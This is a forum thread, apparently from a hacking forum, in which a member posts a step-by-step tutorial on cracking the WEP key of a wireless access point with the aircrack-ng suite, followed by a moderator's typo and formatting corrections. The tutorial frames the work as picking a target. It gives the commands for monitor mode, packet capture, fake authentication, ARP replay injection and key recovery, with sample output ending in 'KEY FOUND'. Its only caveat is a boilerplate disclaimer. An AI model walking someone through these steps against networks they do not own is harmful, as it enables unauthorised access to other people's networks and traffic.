Cracking WEP with the aircrack-ng suite

This is where members can submit tutorials that they have created on any computing related subject.
Post Reply
jacksold
n00b
Posts: 2
Joined: Tue Jul 05, 2016 4:19 am

Cracking WEP with the aircrack-ng suite

Post by jacksold » Thu Jul 07, 2016 2:34 am

Prerequisites:
Linux CMD experience
Backtrack 4 R2 or Ubuntu 7.10 + patched WiFi Drivers + Aircrack-ng suite
common sense

The information in this tutorial is for educational and informational purposes only, use it at your own risk. Soldierx.com, it's members, crew, and affiliates cannot be held responsible for the misuse of this information.

WEP encryption has been hailed as one of the least secure methods of securing a wireless access point in the history of WiFi since wireless encryption standards began being developed. The main reason for this is that fragments of the key are sent between a client computer and the access point in 32bit initialization vectors commonly referred to as ICV's. Statistically it has been shown that a certain volume of these have weak encryption and are vulnerable to packet analysis. The number of packets required to crack an access point's key can vary from 200 to 500 thousand for 64 and 128 bit encryption respectively.

***NOTE***
**This Tutorial will cover a basic WEP crack
**It is by no means exhaustive and is meant for
**A jumping off point, from here I send you to Google
**The place where I first got my information.
**********

***ALL COMMANDS LISTED IN THIS TUTORIAL ARE BING RUN FROM THE root ACCOUNT ON THE MACHINE, IF YOU ARE NOT RUNNING BACKTRACK OR YOU BUILT YOUR OWN SYSTEM YOU NEED TO LOG IN AS ROOT OR sudo EACH COMMAND***

The first step in any cracker's attempt at a WiFi access point is to pick a target. This can be achieved by running airmon-ng to list any and all available network adapters.

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
Then you want to type airodump-ng start (adapter name: ath0, wlan0, wlan1, etc) What this does is put you wireless adapter into promiscuous or monitor mode which allows it to accept all traffic and basically grab ARP packets and such from out of the air, it also allows tha adapter to do what is called packet injection, basically shooting packets into the network to get a response from the Access point. The next command to run is airodump-ng (adapter name: mon0, mon1, eth0, etc.) this will list all available access points and let you choose one. you will want to pick one with the best signal. The way to check what the best signal is is to look at the pwr column while the program is running. a strong signal will be a low number preceded by a dash (-) such as -56 or -86. The First example would be the stronger one as I believe the strength is measured in -dBm or the power ratio in decibels (dB) of the measured power referenced to one milliwatt. the lower number being stronger as you get more towards a positive output of power.

CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
Once you have selected your target, make note of the BSSID, Channel, and the amount of data it recieves. Another good indicator of a good accesspoint to crack would be a reasonable amount of data recieved (80-120 without injection, can be more). You would then run the command airodump-ng -w filename --channel (channel of target) --bssid (bssid or MAC address of target) (interface to capture on, mon0, eth0, whatever airmon gives you as the monitor mode interface typically mon0)

Example:
airodump-ng -w output --channel 9 --bssid 00:14:6C:7E:40:80 ath0
At this stage you would then open a tab in your console window for a separate session and run aireplay-ng -1 0 -a (bssid of target) (interface) this is a fake authentication attack and will give you something like this:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful Smile

if you are successful. once you have achieved a successful association then you run the injection to gather data. (you want to run this alongside airodump-ng because airodump captures and dumps packets to a .cap file that you will be running through aircrack-ng). To set the attack we will be running this command aireplay-ng -3 -b (bssid of target) (interface) . This command starts an ARP request replay attack which will stimulate the gathering of data that you need to crack the access point with.
Example:
aireplay-ng -3 -b 00:14:6C:7E:40:80 ath0
You Should see this:
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
open another console window, a third one, and enter aircrack-ng filename.cap and aricrack will attempt a crack with what you have captured, and if it does not succeed it will monitor the amount of data you have recieved and continue trying to crack the key at regular intervals. once the crack has succeeded you will know it by a screen that has this:
Aircrack-ng 0.9


[00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%
this screen will let you know that you have successfully cracked the key and you can copy it down to use or test. you cn backup the .cap files to a flash drive and crack at a later date if you lose the key. though if the access point's key changes you may have to crack it again.

This is all that is really needed to know to crack a WEP encrypted access point.

Reference:
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack
just do it

User avatar
Cool_Fire
Not a sandwich
Posts: 1912
Joined: Fri May 09, 2003 1:20 pm
Location: 41 6d 73 74 65 72 64 61 6d
Contact:

Re: Cracking WEP with the aircrack-ng suite

Post by Cool_Fire » Sat Jul 09, 2016 3:29 pm

Nice writeup.

A few quick remarks before it can be moved into the tutorial section;
jacksold wrote: The information in this tutorial is for educational and informational purposes only, use it at your own risk. Soldierx.com, it's members, crew, and affiliates cannot be held responsible for the misuse of this information.
Who or what is Soldierx.com and why would they be liable for anything published on hackerthreads.org?
jacksold wrote: ***ALL COMMANDS LISTED IN THIS TUTORIAL ARE BING RUN FROM THE root ACCOUNT ON THE MACHINE, IF YOU ARE NOT RUNNING BACKTRACK OR YOU BUILT YOUR OWN SYSTEM YOU NEED TO LOG IN AS ROOT OR sudo EACH COMMAND***
BING => BEING
jacksold wrote: this screen will let you know that you have successfully cracked the key and you can copy it down to use or test. you cn backup the .cap files to a flash drive and crack at a later date if you lose the key. though if the access point's key changes you may have to crack it again.
cn => can

I'd also suggest using

Code: Select all

code blocks like these
for commands/output. It makes it a lot clearer and preserves output formatting.
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.

Post Reply